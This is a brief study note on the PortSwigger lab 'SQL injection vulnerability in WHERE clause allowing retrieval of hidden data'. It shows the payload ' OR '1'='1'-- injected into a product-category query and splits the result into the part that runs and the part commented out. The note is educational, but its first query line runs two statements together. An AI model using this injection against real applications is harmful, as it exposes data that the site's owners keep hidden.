SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data





Last updated
https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data





Last updated
SELECT * FROM products WHERE category = 'Accessories' AND released = 1' OR '1'='1'--SELECT * FROM products WHERE category = '' OR '1' = '1'--' AND released = 1
## Queried part:
SELECT * FROM products WHERE category = '' OR '1' = '1'
## Commented part:
' AND released = 1